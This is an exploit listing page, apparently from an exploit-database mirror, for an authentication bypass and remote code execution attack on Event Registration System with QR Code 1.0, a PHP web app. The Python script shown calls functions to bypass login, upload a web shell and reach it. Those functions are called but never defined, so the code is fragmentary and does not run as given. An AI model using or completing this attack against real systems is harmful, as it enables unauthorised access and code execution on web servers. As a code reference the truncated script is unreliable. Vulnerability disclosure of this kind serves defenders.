Event registration system with qr code 1.0 authentication bypass Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-07-28 |
Type : webapps |
Platform : php
This exploit / vulnerability Event registration system with qr code 1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
import os, re, sys, argparse, requests
from termcolor import cprint
s = requests.Session()
s = auth_bypass(s, proxies, login_url)
s = upload_shell(s, proxies, upload_url)
s = get_shell_url(s, proxies, shell_url)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
cprint("[-] User aborted session\n", "red")
sys.exit(0)
# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
Event registration system with qr code 1.0 authentication bypass